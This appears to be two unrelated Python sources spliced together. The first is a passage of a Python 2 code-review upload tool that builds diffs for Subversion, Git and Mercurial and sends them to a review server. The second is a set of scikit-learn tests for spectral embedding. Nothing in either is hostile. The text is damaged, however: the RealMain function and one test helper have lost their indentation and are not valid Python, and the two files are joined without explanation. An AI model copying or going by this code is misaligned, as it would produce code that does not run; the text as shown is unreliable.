      cmd += ["-r", self.options.revision]
    cmd.extend(args)
    data = RunShell(cmd)
    # Sanity-check that the diff actually contains per-file sections.
    count = 0
    for line in data.splitlines():
      if line.startswith("Index:") or line.startswith("Property changes on:"):
        count += 1
        logging.info(line)
    if not count:
      ErrorExit("No valid patches found in output from svn diff")
    return data

  def _CollapseKeywords(self, content, keyword_str):
    """Collapses SVN keywords."""
    # svn cat translates keywords but svn diff doesn't. As a result of this
    # behavior patching.PatchChunks() fails with a chunk mismatch error.
    # This part was originally written by the Review Board development team
    # who had the same problem (http://reviews.review-board.org/r/276/).
    # Mapping of keywords to known aliases
    svn_keywords = {
      # Standard keywords
      'Date':                ['Date', 'LastChangedDate'],
      'Revision':            ['Revision', 'LastChangedRevision', 'Rev'],
      'Author':              ['Author', 'LastChangedBy'],
      'HeadURL':             ['HeadURL', 'URL'],
      'Id':                  ['Id'],

      # Aliases
      'LastChangedDate':     ['LastChangedDate', 'Date'],
      'LastChangedRevision': ['LastChangedRevision', 'Rev', 'Revision'],
      'LastChangedBy':       ['LastChangedBy', 'Author'],
      'URL':                 ['URL', 'HeadURL'],
    }

    def repl(m):
      # Collapse an expanded keyword ($Kw: value $) back to $Kw::  ...$ or
      # $Kw$ so diff and cat output agree.
      if m.group(2):
        return "$%s::%s$" % (m.group(1), " " * len(m.group(3)))
      return "$%s$" % m.group(1)

    keywords = [keyword
                for name in keyword_str.split(" ")
                for keyword in svn_keywords.get(name, [])]
    return re.sub(r"\$(%s):(:?)([^\$]+)\$" % '|'.join(keywords), repl, content)

  def GetUnknownFiles(self):
    status = RunShell(["svn", "status", "--ignore-externals"], silent_ok=True)
    unknown_files = []
    for line in status.split("\n"):
      # "?" in column 0 marks an unversioned item.
      if line and line[0] == "?":
        unknown_files.append(line)
    return unknown_files

  def ReadFile(self, filename):
    """Returns the contents of a file."""
    file = open(filename, 'rb')
    result = ""
    try:
      result = file.read()
    finally:
      file.close()
    return result

  def GetStatus(self, filename):
    """Returns the status of a file."""
    if not self.options.revision:
      status = RunShell(["svn", "status", "--ignore-externals", filename])
      if not status:
        ErrorExit("svn status returned no output for %s" % filename)
      status_lines = status.splitlines()
      # If file is in a cl, the output will begin with
      # "\n--- Changelist 'cl_name':\n".  See
      # http://svn.collab.net/repos/svn/trunk/notes/changelist-design.txt
      if (len(status_lines) == 3 and
          not status_lines[0] and
          status_lines[1].startswith("--- Changelist")):
        status = status_lines[2]
      else:
        status = status_lines[0]
    # If we have a revision to diff against we need to run "svn list"
    # for the old and the new revision and compare the results to get
    # the correct status for a file.
    else:
      dirname, relfilename = os.path.split(filename)
      if dirname not in self.svnls_cache:
        cmd = ["svn", "list", "-r", self.rev_start, dirname or "."]
        out, returncode = RunShellWithReturnCode(cmd)
        if returncode:
          ErrorExit("Failed to get status for %s." % filename)
        old_files = out.splitlines()
        args = ["svn", "list"]
        if self.rev_end:
          args += ["-r", self.rev_end]
        cmd = args + [dirname or "."]
        out, returncode = RunShellWithReturnCode(cmd)
        if returncode:
          ErrorExit("Failed to run command %s" % cmd)
        self.svnls_cache[dirname] = (old_files, out.splitlines())
      # Derive added/modified/deleted from membership in the two listings.
      old_files, new_files = self.svnls_cache[dirname]
      if relfilename in old_files and relfilename not in new_files:
        status = "D "
      elif relfilename in old_files and relfilename in new_files:
        status = "M "
      else:
        status = "A "
    return status

  def GetBaseFile(self, filename):
    status = self.GetStatus(filename)
    base_content = None
    new_content = None

    # If a file is copied its status will be "A  +", which signifies
    # "addition-with-history".  See "svn st" for more information.  We need to
    # upload the original file or else diff parsing will fail if the file was
    # edited.
    if status[0] == "A" and status[3] != "+":
      # We'll need to upload the new content if we're adding a binary file
      # since diff's output won't contain it.
      mimetype = RunShell(["svn", "propget", "svn:mime-type", filename],
                          silent_ok=True)
      base_content = ""
      is_binary = bool(mimetype) and not mimetype.startswith("text/")
      if is_binary and self.IsImage(filename):
        new_content = self.ReadFile(filename)
    elif (status[0] in ("M", "D", "R") or
          (status[0] == "A" and status[3] == "+") or  # Copied file.
          (status[0] == " " and status[1] == "M")):  # Property change.
      args = []
      if self.options.revision:
        url = "%s/%s@%s" % (self.svn_base, filename, self.rev_start)
      else:
        # Don't change filename, it's needed later.
        url = filename
        args += ["-r", "BASE"]
      cmd = ["svn"] + args + ["propget", "svn:mime-type", url]
      mimetype, returncode = RunShellWithReturnCode(cmd)
      if returncode:
        # File does not exist in the requested revision.
        # Reset mimetype, it contains an error message.
        mimetype = ""
      get_base = False
      is_binary = bool(mimetype) and not mimetype.startswith("text/")
      if status[0] == " ":
        # Empty base content just to force an upload.
        base_content = ""
      elif is_binary:
        if self.IsImage(filename):
          get_base = True
          if status[0] == "M":
            if not self.rev_end:
              new_content = self.ReadFile(filename)
            else:
              url = "%s/%s@%s" % (self.svn_base, filename, self.rev_end)
              new_content = RunShell(["svn", "cat", url],
                                     universal_newlines=True, silent_ok=True)
        else:
          base_content = ""
      else:
        get_base = True

      if get_base:
        # Binary bases must be fetched byte-exact; text may normalize EOLs.
        if is_binary:
          universal_newlines = False
        else:
          universal_newlines = True
        if self.rev_start:
          # "svn cat -r REV delete_file.txt" doesn't work. cat requires
          # the full URL with "@REV" appended instead of using "-r" option.
          url = "%s/%s@%s" % (self.svn_base, filename, self.rev_start)
          base_content = RunShell(["svn", "cat", url],
                                  universal_newlines=universal_newlines,
                                  silent_ok=True)
        else:
          base_content = RunShell(["svn", "cat", filename],
                                  universal_newlines=universal_newlines,
                                  silent_ok=True)
        if not is_binary:
          args = []
          if self.rev_start:
            url = "%s/%s@%s" % (self.svn_base, filename, self.rev_start)
          else:
            url = filename
            args += ["-r", "BASE"]
          cmd = ["svn"] + args + ["propget", "svn:keywords", url]
          keywords, returncode = RunShellWithReturnCode(cmd)
          if keywords and not returncode:
            base_content = self._CollapseKeywords(base_content, keywords)
    else:
      StatusUpdate("svn status returned unexpected output: %s" % status)
      sys.exit(1)
    return base_content, new_content, is_binary, status[0:5]
class GitVCS(VersionControlSystem):
  """Implementation of the VersionControlSystem interface for Git."""

  def __init__(self, options):
    super(GitVCS, self).__init__(options)
    # Map of filename -> (hash before, hash after) of base file.
    # Hashes for "no such file" are represented as None.
    self.hashes = {}
    # Map of new filename -> old filename for renames.
    self.renames = {}

  def GenerateDiff(self, extra_args):
    # This is more complicated than svn's GenerateDiff because we must convert
    # the diff output to include an svn-style "Index:" line as well as record
    # the hashes of the files, so we can upload them along with our diff.

    # Special hash value used by git to indicate "no such content".
    NULL_HASH = "0"*40

    extra_args = extra_args[:]
    if self.options.revision:
      extra_args = [self.options.revision] + extra_args
    # -M enables rename detection so we can populate self.renames.
    extra_args.append('-M')

    # --no-ext-diff is broken in some versions of Git, so try to work around
    # this by overriding the environment (but there is still a problem if the
    # git config key "diff.external" is used).
    env = os.environ.copy()
    if 'GIT_EXTERNAL_DIFF' in env: del env['GIT_EXTERNAL_DIFF']
    gitdiff = RunShell(["git", "diff", "--no-ext-diff", "--full-index"]
                       + extra_args, env=env)
    svndiff = []
    filecount = 0
    filename = None
    for line in gitdiff.splitlines():
      match = re.match(r"diff --git a/(.*) b/(.*)$", line)
      if match:
        filecount += 1
        # Intentionally use the "after" filename so we can show renames.
        filename = match.group(2)
        svndiff.append("Index: %s\n" % filename)
        if match.group(1) != match.group(2):
          self.renames[match.group(2)] = match.group(1)
      else:
        # The "index" line in a git diff looks like this (long hashes elided):
        # index 82c0d44..b2cee3f 100755
        # We want to save the left hash, as that identifies the base file.
        match = re.match(r"index (\w+)\.\.(\w+)", line)
        if match:
          before, after = (match.group(1), match.group(2))
          if before == NULL_HASH:
            before = None
          if after == NULL_HASH:
            after = None
          self.hashes[filename] = (before, after)
      svndiff.append(line + "\n")
    if not filecount:
      ErrorExit("No valid patches found in output from git diff")
    return "".join(svndiff)

  def GetUnknownFiles(self):
    status = RunShell(["git", "ls-files", "--exclude-standard", "--others"],
                      silent_ok=True)
    return status.splitlines()

  def GetFileContent(self, file_hash, is_binary):
    """Returns the content of a file identified by its git hash."""
    data, retcode = RunShellWithReturnCode(["git", "show", file_hash],
                                           universal_newlines=not is_binary)
    if retcode:
      ErrorExit("Got error status from 'git show %s'" % file_hash)
    return data

  def GetBaseFile(self, filename):
    hash_before, hash_after = self.hashes.get(filename, (None,None))
    base_content = None
    new_content = None
    is_binary = self.IsBinary(filename)
    status = None

    if filename in self.renames:
      status = "A +"  # Match svn attribute name for renames.
      if filename not in self.hashes:
        # If a rename doesn't change the content, we never get a hash.
        # NOTE(review): "git show <path>" treats its argument as a revision
        # spec, not a worktree path -- confirm this branch works as intended.
        base_content = RunShell(["git", "show", filename])
    elif not hash_before:
      status = "A"
      base_content = ""
    elif not hash_after:
      status = "D"
    else:
      status = "M"

    is_image = self.IsImage(filename)

    # Grab the before/after content if we need it.
    # We should include file contents if it's text or it's an image.
    if not is_binary or is_image:
      # Grab the base content if we don't have it already.
      if base_content is None and hash_before:
        base_content = self.GetFileContent(hash_before, is_binary)
      # Only include the "after" file if it's an image; otherwise it
      # is reconstructed from the diff.
      if is_image and hash_after:
        new_content = self.GetFileContent(hash_after, is_binary)

    return (base_content, new_content, is_binary, status)
class MercurialVCS(VersionControlSystem):
  """Implementation of the VersionControlSystem interface for Mercurial."""

  def __init__(self, options, repo_dir):
    """Args:
      options: Parsed command-line options.
      repo_dir: Path to the repository root (typically "hg root" output).
    """
    super(MercurialVCS, self).__init__(options)
    # Absolute path to repository (we can be in a subdir)
    self.repo_dir = os.path.normpath(repo_dir)
    # Compute the subdir
    cwd = os.path.normpath(os.getcwd())
    assert cwd.startswith(self.repo_dir)
    self.subdir = cwd[len(self.repo_dir):].lstrip(r"\/")
    if self.options.revision:
      self.base_rev = self.options.revision
    else:
      # Default to the working directory's parent revision.
      self.base_rev = RunShell(["hg", "parent", "-q"]).split(':')[1].strip()

  def _GetRelPath(self, filename):
    """Get relative path of a file according to the current directory,
    given its logical path in the repo."""
    assert filename.startswith(self.subdir), (filename, self.subdir)
    return filename[len(self.subdir):].lstrip(r"\/")

  def GenerateDiff(self, extra_args):
    """Return "hg diff --git" output rewritten to resemble svn diff.

    Each per-file header is replaced by an "Index:" line plus a 67-char
    separator, so the upload server can parse it like a Subversion diff.
    """
    # If no file specified, restrict to the current subdir
    extra_args = extra_args or ["."]
    cmd = ["hg", "diff", "--git", "-r", self.base_rev] + extra_args
    data = RunShell(cmd, silent_ok=True)
    svndiff = []
    filecount = 0
    for line in data.splitlines():
      m = re.match("diff --git a/(\S+) b/(\S+)", line)
      if m:
        # Modify line to make it look like as it comes from svn diff.
        # With this modification no changes on the server side are required
        # to make upload.py work with Mercurial repos.
        # NOTE: for proper handling of moved/copied files, we have to use
        # the second filename.
        filename = m.group(2)
        svndiff.append("Index: %s" % filename)
        svndiff.append("=" * 67)
        filecount += 1
        logging.info(line)
      else:
        svndiff.append(line)
    if not filecount:
      ErrorExit("No valid patches found in output from hg diff")
    return "\n".join(svndiff) + "\n"

  def GetUnknownFiles(self):
    """Return a list of files unknown to the VCS."""
    args = []
    # "hg status -u" reports untracked files as "? <name>" lines.
    status = RunShell(["hg", "status", "--rev", self.base_rev, "-u", "."],
        silent_ok=True)
    unknown_files = []
    for line in status.splitlines():
      st, fn = line.split(" ", 1)
      if st == "?":
        unknown_files.append(fn)
    return unknown_files

  def GetBaseFile(self, filename):
    """Return (base_content, new_content, is_binary, status) for filename.

    "hg status" and "hg cat" both take a path relative to the current subdir
    rather than to the repo root, but "hg diff" has given us the full path
    to the repo root.
    """
    base_content = ""
    new_content = None
    is_binary = False
    oldrelpath = relpath = self._GetRelPath(filename)
    # "hg status -C" returns two lines for moved/copied files, one otherwise
    out = RunShell(["hg", "status", "-C", "--rev", self.base_rev, relpath])
    out = out.splitlines()
    # HACK: strip error message about missing file/directory if it isn't in
    # the working copy
    if out[0].startswith('%s: ' % relpath):
      out = out[1:]
    if len(out) > 1:
      # Moved/copied => considered as modified, use old filename to
      # retrieve base contents
      oldrelpath = out[1].strip()
      status = "M"
    else:
      status, _ = out[0].split(' ', 1)
    # base_rev may be "local:global"; "hg cat" only needs the first part.
    if ":" in self.base_rev:
      base_rev = self.base_rev.split(":", 1)[0]
    else:
      base_rev = self.base_rev
    if status != "A":
      base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
        silent_ok=True)
      is_binary = "\0" in base_content  # Mercurial's heuristic
    if status != "R":
      new_content = open(relpath, "rb").read()
      is_binary = is_binary or "\0" in new_content
    if is_binary and base_content:
      # Fetch again without converting newlines
      base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
        silent_ok=True, universal_newlines=False)
    if not is_binary or not self.IsImage(relpath):
      # Text files are reconstructed from the diff server-side; only images
      # need their new content uploaded.
      new_content = None
    return base_content, new_content, is_binary, status
# NOTE: The SplitPatch function is duplicated in engine.py, keep them in sync.
def SplitPatch(data):
  """Splits a patch into separate pieces for each file.

  Args:
    data: A string containing the output of svn diff.

  Returns:
    A list of 2-tuple (filename, text) where text is the svn diff output
    pertaining to filename.
  """
  patches = []
  current_name = None
  current_lines = []
  for line in data.splitlines(True):
    boundary_name = None
    if line.startswith('Index:'):
      boundary_name = line.split(':', 1)[1].strip()
    elif line.startswith('Property changes on:'):
      # When a file is modified, paths use '/' between directories, however
      # when a property is modified '\' is used on Windows. Make them the same
      # otherwise the file shows up twice.
      prop_name = line.split(':', 1)[1].strip().replace('\\', '/')
      if prop_name != current_name:
        # File has property changes but no modifications, create a new diff.
        boundary_name = prop_name
    if boundary_name:
      # Flush the diff collected so far and start a fresh one.
      if current_name and current_lines:
        patches.append((current_name, ''.join(current_lines)))
      current_name = boundary_name
      current_lines = [line]
    else:
      current_lines.append(line)
  if current_name and current_lines:
    patches.append((current_name, ''.join(current_lines)))
  return patches
def UploadSeparatePatches(issue, rpc_server, patchset, data, options):
  """Uploads a separate patch for each file in the diff output.

  Args:
    issue: Issue id (string or int convertible).
    rpc_server: Server object providing Send() for the uploads.
    patchset: Patchset id the patches belong to.
    data: Full diff text; split per-file with SplitPatch().
    options: Parsed options (download_base controls content_upload).

  Returns a list of [patch_key, filename] for each file.
  """
  patches = SplitPatch(data)
  rv = []
  for patch in patches:
    # Skip oversized per-file patches instead of aborting the whole upload.
    if len(patch[1]) > MAX_UPLOAD_SIZE:
      print ("Not uploading the patch for " + patch[0] +
             " because the file is too large.")
      continue
    form_fields = [("filename", patch[0])]
    if not options.download_base:
      form_fields.append(("content_upload", "1"))
    files = [("data", "data.diff", patch[1])]
    ctype, body = EncodeMultipartFormData(form_fields, files)
    url = "/%d/upload_patch/%d" % (int(issue), int(patchset))
    print "Uploading patch for " + patch[0]
    response_body = rpc_server.Send(url, body, content_type=ctype)
    lines = response_body.splitlines()
    # On success the server answers "OK" followed by the patch key.
    if not lines or lines[0] != "OK":
      StatusUpdate(" --> %s" % response_body)
      sys.exit(1)
    rv.append([lines[1], patch[0]])
  return rv
def GuessVCSName():
  """Helper to guess the version control system.

  This examines the current directory, guesses which VersionControlSystem
  we're using, and returns an string indicating which VCS is detected.

  Returns:
    A pair (vcs, output).  vcs is a string indicating which VCS was detected
    and is one of VCS_GIT, VCS_MERCURIAL, VCS_SUBVERSION, or VCS_UNKNOWN.
    output is a string containing any interesting output from the vcs
    detection routine, or None if there is nothing interesting.
  """
  # Mercurial has a command to get the base directory of a repository
  # Try running it, but don't die if we don't have hg installed.
  # NOTE: we try Mercurial first as it can sit on top of an SVN working copy.
  try:
    out, returncode = RunShellWithReturnCode(["hg", "root"])
    if returncode == 0:
      return (VCS_MERCURIAL, out.strip())
  except OSError, (errno, message):
    if errno != 2:  # ENOENT -- they don't have hg installed.
      raise

  # Subversion has a .svn in all working directories.
  if os.path.isdir('.svn'):
    logging.info("Guessed VCS = Subversion")
    return (VCS_SUBVERSION, None)

  # Git has a command to test if you're in a git tree.
  # Try running it, but don't die if we don't have git installed.
  try:
    out, returncode = RunShellWithReturnCode(["git", "rev-parse",
                                              "--is-inside-work-tree"])
    if returncode == 0:
      return (VCS_GIT, None)
  except OSError, (errno, message):
    if errno != 2:  # ENOENT -- they don't have git installed.
      raise

  return (VCS_UNKNOWN, None)
def GuessVCS(options):
  """Helper to guess the version control system.

  This verifies any user-specified VersionControlSystem (by command line
  or environment variable).  If the user didn't specify one, this examines
  the current directory, guesses which VersionControlSystem we're using,
  and returns an instance of the appropriate class.  Exit with an error
  if we can't figure it out.

  Returns:
    A VersionControlSystem instance. Exits if the VCS can't be guessed.
  """
  vcs = options.vcs
  if not vcs:
    vcs = os.environ.get("CODEREVIEW_VCS")
  extra_output = None
  if vcs:
    # Explicit choice: resolve the abbreviation or bail out.
    resolved = VCS_ABBREVIATIONS.get(vcs.lower())
    if resolved is None:
      ErrorExit("Unknown version control system %r specified." % vcs)
    vcs = resolved
  else:
    vcs, extra_output = GuessVCSName()

  if vcs == VCS_MERCURIAL:
    if extra_output is None:
      extra_output = RunShell(["hg", "root"]).strip()
    return MercurialVCS(options, extra_output)
  if vcs == VCS_SUBVERSION:
    return SubversionVCS(options)
  if vcs == VCS_GIT:
    return GitVCS(options)

  ErrorExit(("Could not guess version control system. "
             "Are you in a working copy directory?"))
def RealMain(argv, data=None):
"""The real main function.
Args:
argv: Command line arguments.
data: Diff contents. If None (default) the diff is generated by
the VersionControlSystem implementation returned by GuessVCS().
Returns:
A 2-tuple (issue id, patchset id).
The patchset id is None if the base files are not uploaded by this
script (applies only to SVN checkouts).
"""
logging.basicConfig(format=("%(asctime).19s %(levelname)s %(filename)s:"
"%(lineno)s %(message)s "))
os.environ['LC_ALL'] = 'C'
options, args = parser.parse_args(argv[1:])
global verbosity
verbosity = options.verbose
if verbosity >= 3:
logging.getLogger().setLevel(logging.DEBUG)
elif verbosity >= 2:
logging.getLogger().setLevel(logging.INFO)
vcs = GuessVCS(options)
if isinstance(vcs, SubversionVCS):
# base field is only allowed for Subversion.
# Note: Fetching base files may become deprecated in future releases.
base = vcs.GuessBase(options.download_base)
else:
base = None
if not base and options.download_base:
options.download_base = True
logging.info("Enabled upload of base file")
if not options.assume_yes:
vcs.CheckForUnknownFiles()
if data is None:
data = vcs.GenerateDiff(args)
files = vcs.GetBaseFiles(data)
if verbosity >= 1:
print "Upload server:", options.server, "(change with -s/--server)"
if options.issue:
prompt = "Message describing this patch set: "
else:
prompt = "New issue subject: "
message = options.message or raw_input(prompt).strip()
if not message:
ErrorExit("A non-empty message is required")
rpc_server = GetRpcServer(options)
form_fields = [("subject", message)]
if base:
form_fields.append(("base", base))
if options.issue:
form_fields.append(("issue", str(options.issue)))
if options.email:
form_fields.append(("user", options.email))
if options.reviewers:
for reviewer in options.reviewers.split(','):
if "@" in reviewer and not reviewer.split("@")[1].count(".") == 1:
ErrorExit("Invalid email address: %s" % reviewer)
form_fields.append(("reviewers", options.reviewers))
if options.cc:
for cc in options.cc.split(','):
if "@" in cc and not cc.split("@")[1].count(".") == 1:
ErrorExit("Invalid email address: %s" % cc)
form_fields.append(("cc", options.cc))
description = options.description
if options.description_file:
if options.description:
ErrorExit("Can't specify description and description_file")
file = open(options.description_file, 'r')
description = file.read()
file.close()
if description:
form_fields.append(("description", description))
# Send a hash of all the base file so the server can determine if a copy
# already exists in an earlier patchset.
base_hashes = ""
for file, info in files.iteritems():
if not info[0] is None:
checksum = md5(info[0]).hexdigest()
if base_hashes:
base_hashes += "|"
base_hashes += checksum + ":" + file
form_fields.append(("base_hashes", base_hashes))
if options.private:
if options.issue:
print "Warning: Private flag ignored when updating an existing issue."
else:
form_fields.append(("private", "1"))
# If we're uploading base files, don't send the email before the uploads, so
# that it contains the file status.
if options.send_mail and options.download_base:
form_fields.append(("send_mail", "1"))
if not options.download_base:
form_fields.append(("content_upload", "1"))
if len(data) > MAX_UPLOAD_SIZE:
print "Patch is large, so uploading file patches separately."
uploaded_diff_file = []
form_fields.append(("separate_patches", "1"))
else:
uploaded_diff_file = [("data", "data.diff", data)]
ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
response_body = rpc_server.Send("/upload", body, content_type=ctype)
patchset = None
if not options.download_base or not uploaded_diff_file:
lines = response_body.splitlines()
if len(lines) >= 2:
msg = lines[0]
patchset = lines[1].strip()
patches = [x.split(" ", 1) for x in lines[2:]]
else:
msg = response_body
else:
msg = response_body
if not response_body.startswith("Issue created.") and \
not response_body.startswith("Issue updated."):
print >>sys.stderr, msg
sys.exit(0)
issue = msg[msg.rfind("/")+1:]
if not uploaded_diff_file:
result = UploadSeparatePatches(issue, rpc_server, patchset, data, options)
if not options.download_base:
patches = result
if not options.download_base:
vcs.UploadBaseFiles(issue, rpc_server, patches, patchset, options, files)
if options.send_mail:
rpc_server.Send("/" + issue + "/mail", payload="")
return issue, patchset
def main():
  """Script entry point: run RealMain and turn Ctrl-C into a clean exit(1)."""
  try:
    RealMain(sys.argv)
  except KeyboardInterrupt:
    print
    StatusUpdate("Interrupted.")
    sys.exit(1)
|
import pytest
import numpy as np
from scipy import sparse
from scipy.sparse import csgraph
from scipy.linalg import eigh
from sklearn.manifold import SpectralEmbedding
from sklearn.manifold._spectral_embedding import _graph_is_connected
from sklearn.manifold._spectral_embedding import _graph_connected_component
from sklearn.manifold import spectral_embedding
from sklearn.metrics.pairwise import rbf_kernel
from sklearn.metrics import normalized_mutual_info_score
from sklearn.neighbors import NearestNeighbors
from sklearn.cluster import KMeans
from sklearn.datasets import make_blobs
from sklearn.utils.extmath import _deterministic_vector_sign_flip
from sklearn.utils._testing import assert_array_almost_equal
from sklearn.utils._testing import assert_array_equal
# Non centered, sparse centers to check the embedding on a non-trivial
# blob layout (each cluster center touches a different subset of features).
centers = np.array([
    [0.0, 5.0, 0.0, 0.0, 0.0],
    [0.0, 0.0, 4.0, 0.0, 0.0],
    [1.0, 0.0, 0.0, 5.0, 1.0],
])
n_samples = 1000
n_clusters, n_features = centers.shape
# Shared dataset used by most tests below.
S, true_labels = make_blobs(n_samples=n_samples, centers=centers,
                            cluster_std=1., random_state=42)
def _check_with_col_sign_flipping(A, B, tol=0.0):
""" Check array A and B are equal with possible sign flipping on
each columns"""
sign = True
for column_idx in range(A.shape[1]):
sign = sign and ((((A[:, column_idx] -
B[:, column_idx]) ** 2).mean() <= tol ** 2) or
(((A[:, column_idx] +
B[:, column_idx]) ** 2).mean() <= tol ** 2))
if not sign:
return False
return True
def test_sparse_graph_connected_component():
    # Build a sparse affinity made of four disjoint groups and check that
    # _graph_connected_component recovers each group exactly.
    # NOTE(review): assertions depend on the exact rng draw order below.
    rng = np.random.RandomState(42)
    n_samples = 300
    boundaries = [0, 42, 121, 200, n_samples]
    p = rng.permutation(n_samples)
    connections = []
    for start, stop in zip(boundaries[:-1], boundaries[1:]):
        group = p[start:stop]
        # Connect all elements within the group at least once via an
        # arbitrary path that spans the group.
        for i in range(len(group) - 1):
            connections.append((group[i], group[i + 1]))
        # Add some more random connections within the group
        min_idx, max_idx = 0, len(group) - 1
        n_random_connections = 1000
        source = rng.randint(min_idx, max_idx, size=n_random_connections)
        target = rng.randint(min_idx, max_idx, size=n_random_connections)
        connections.extend(zip(group[source], group[target]))

    # Build a symmetric affinity matrix
    row_idx, column_idx = tuple(np.array(connections).T)
    data = rng.uniform(.1, 42, size=len(connections))
    affinity = sparse.coo_matrix((data, (row_idx, column_idx)))
    affinity = 0.5 * (affinity + affinity.T)

    for start, stop in zip(boundaries[:-1], boundaries[1:]):
        component_1 = _graph_connected_component(affinity, p[start])
        component_size = stop - start
        assert component_1.sum() == component_size

        # We should retrieve the same component mask by starting by both ends
        # of the group
        component_2 = _graph_connected_component(affinity, p[stop - 1])
        assert component_2.sum() == component_size
        assert_array_equal(component_1, component_2)
def test_spectral_embedding_two_components(seed=36):
    # Test spectral embedding with two components
    random_state = np.random.RandomState(seed)
    n_sample = 100
    affinity = np.zeros(shape=[n_sample * 2, n_sample * 2])
    # first component
    affinity[0:n_sample,
             0:n_sample] = np.abs(random_state.randn(n_sample, n_sample)) + 2
    # second component
    affinity[n_sample::,
             n_sample::] = np.abs(random_state.randn(n_sample, n_sample)) + 2

    # Test of internal _graph_connected_component before connection
    component = _graph_connected_component(affinity, 0)
    assert component[:n_sample].all()
    assert not component[n_sample:].any()
    component = _graph_connected_component(affinity, -1)
    assert not component[:n_sample].any()
    assert component[n_sample:].all()

    # connection: add a single symmetric edge between the two blocks
    affinity[0, n_sample + 1] = 1
    affinity[n_sample + 1, 0] = 1
    # Zero the diagonal, then re-symmetrize.
    affinity.flat[::2 * n_sample + 1] = 0
    affinity = 0.5 * (affinity + affinity.T)

    true_label = np.zeros(shape=2 * n_sample)
    true_label[0:n_sample] = 1

    se_precomp = SpectralEmbedding(n_components=1, affinity="precomputed",
                                   random_state=np.random.RandomState(seed))
    embedded_coordinate = se_precomp.fit_transform(affinity)
    # Some numpy versions are touchy with types
    embedded_coordinate = \
        se_precomp.fit_transform(affinity.astype(np.float32))
    # thresholding on the first components using 0.
    label_ = np.array(embedded_coordinate.ravel() < 0, dtype="float")
    assert normalized_mutual_info_score(true_label, label_) == 1.0
@pytest.mark.parametrize("X", [S, sparse.csr_matrix(S)],
                         ids=["dense", "sparse"])
def test_spectral_embedding_precomputed_affinity(X, seed=36):
    # Embedding a precomputed RBF kernel must match embedding the raw data
    # with affinity="rbf", up to per-column sign flips.
    gamma = 1.0
    kernel_model = SpectralEmbedding(n_components=2, affinity="precomputed",
                                     random_state=np.random.RandomState(seed))
    rbf_model = SpectralEmbedding(n_components=2, affinity="rbf",
                                  gamma=gamma,
                                  random_state=np.random.RandomState(seed))
    embed_from_kernel = kernel_model.fit_transform(rbf_kernel(X, gamma=gamma))
    embed_from_data = rbf_model.fit_transform(X)
    assert_array_almost_equal(
        kernel_model.affinity_matrix_, rbf_model.affinity_matrix_)
    assert _check_with_col_sign_flipping(embed_from_kernel, embed_from_data,
                                         0.05)
def test_precomputed_nearest_neighbors_filtering():
    # A precomputed kNN graph with surplus neighbors must be filtered down
    # to n_neighbors, so the embedding should not depend on the surplus.
    n_neighbors = 2
    results = []
    for extra in [0, 10]:
        nn = NearestNeighbors(n_neighbors=n_neighbors + extra).fit(S)
        graph = nn.kneighbors_graph(S, mode='connectivity')
        model = SpectralEmbedding(random_state=0, n_components=2,
                                  affinity='precomputed_nearest_neighbors',
                                  n_neighbors=n_neighbors)
        results.append(model.fit(graph).embedding_)
    assert_array_equal(results[0], results[1])
@pytest.mark.parametrize("X", [S, sparse.csr_matrix(S)],
                         ids=["dense", "sparse"])
def test_spectral_embedding_callable_affinity(X, seed=36):
    # A callable affinity computing the RBF kernel must behave exactly like
    # the built-in affinity="rbf".
    gamma = 0.9
    reference_kernel = rbf_kernel(S, gamma=gamma)
    callable_model = SpectralEmbedding(
        n_components=2,
        affinity=(lambda x: rbf_kernel(x, gamma=gamma)),
        gamma=gamma,
        random_state=np.random.RandomState(seed))
    builtin_model = SpectralEmbedding(n_components=2, affinity="rbf",
                                      gamma=gamma,
                                      random_state=np.random.RandomState(seed))
    embed_builtin = builtin_model.fit_transform(X)
    embed_callable = callable_model.fit_transform(X)
    assert_array_almost_equal(
        callable_model.affinity_matrix_, builtin_model.affinity_matrix_)
    assert_array_almost_equal(reference_kernel, builtin_model.affinity_matrix_)
    assert _check_with_col_sign_flipping(embed_builtin, embed_callable, 0.05)
# TODO: Remove when pyamg does replaces sp.rand call with np.random.rand
# https://github.com/scikit-learn/scikit-learn/issues/15913
@pytest.mark.filterwarnings(
    "ignore:scipy.rand is deprecated:DeprecationWarning:pyamg.*")
def test_spectral_embedding_amg_solver(seed=36):
    # Test spectral embedding with amg solver
    pytest.importorskip('pyamg')

    se_amg = SpectralEmbedding(n_components=2, affinity="nearest_neighbors",
                               eigen_solver="amg", n_neighbors=5,
                               random_state=np.random.RandomState(seed))
    se_arpack = SpectralEmbedding(n_components=2, affinity="nearest_neighbors",
                                  eigen_solver="arpack", n_neighbors=5,
                                  random_state=np.random.RandomState(seed))
    embed_amg = se_amg.fit_transform(S)
    embed_arpack = se_arpack.fit_transform(S)
    # Both solvers must agree up to per-column sign flips.
    assert _check_with_col_sign_flipping(embed_amg, embed_arpack, 1e-5)

    # same with special case in which amg is not actually used
    # regression test for #10715
    # affinity between nodes
    row = [0, 0, 1, 2, 3, 3, 4]
    col = [1, 2, 2, 3, 4, 5, 5]
    val = [100, 100, 100, 1, 100, 100, 100]

    affinity = sparse.coo_matrix((val + val, (row + col, col + row)),
                                 shape=(6, 6)).toarray()
    se_amg.affinity = "precomputed"
    se_arpack.affinity = "precomputed"
    embed_amg = se_amg.fit_transform(affinity)
    embed_arpack = se_arpack.fit_transform(affinity)
    assert _check_with_col_sign_flipping(embed_amg, embed_arpack, 1e-5)
# TODO: Remove when pyamg does replaces sp.rand call with np.random.rand
# https://github.com/scikit-learn/scikit-learn/issues/15913
@pytest.mark.filterwarnings(
    "ignore:scipy.rand is deprecated:DeprecationWarning:pyamg.*")
def test_spectral_embedding_amg_solver_failure(seed=36):
    # Test spectral embedding with amg solver failure, see issue #13393
    pytest.importorskip('pyamg')

    # The generated graph below is NOT fully connected if n_neighbors=3
    n_samples = 200
    n_clusters = 3
    n_features = 3
    centers = np.eye(n_clusters, n_features)
    S, true_labels = make_blobs(n_samples=n_samples, centers=centers,
                                cluster_std=1., random_state=42)

    se_amg0 = SpectralEmbedding(n_components=3, affinity="nearest_neighbors",
                                eigen_solver="amg", n_neighbors=3,
                                random_state=np.random.RandomState(seed))
    embed_amg0 = se_amg0.fit_transform(S)

    # The embedding must be stable w.r.t. re-seeding the solver.
    for i in range(10):
        se_amg0.set_params(random_state=np.random.RandomState(seed + 1))
        embed_amg1 = se_amg0.fit_transform(S)

        assert _check_with_col_sign_flipping(embed_amg0, embed_amg1, 0.05)
